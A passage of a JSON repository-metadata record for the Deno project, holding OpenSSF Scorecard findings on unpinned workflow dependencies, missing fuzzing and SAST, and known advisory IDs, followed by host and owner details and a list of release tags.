.github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v